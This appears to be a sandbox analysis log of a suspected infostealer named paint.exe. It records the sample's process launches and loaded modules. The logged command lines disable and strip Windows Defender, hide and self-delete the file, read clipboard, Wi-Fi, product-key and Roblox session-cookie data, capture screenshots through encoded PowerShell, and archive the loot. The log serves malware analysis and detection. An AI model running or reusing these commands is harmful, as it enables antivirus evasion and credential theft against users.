Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Users\user\Desktop\paint.exe "C:\Users\user\Desktop\paint.exe"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\paint.exe""	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\paint.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\paint.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
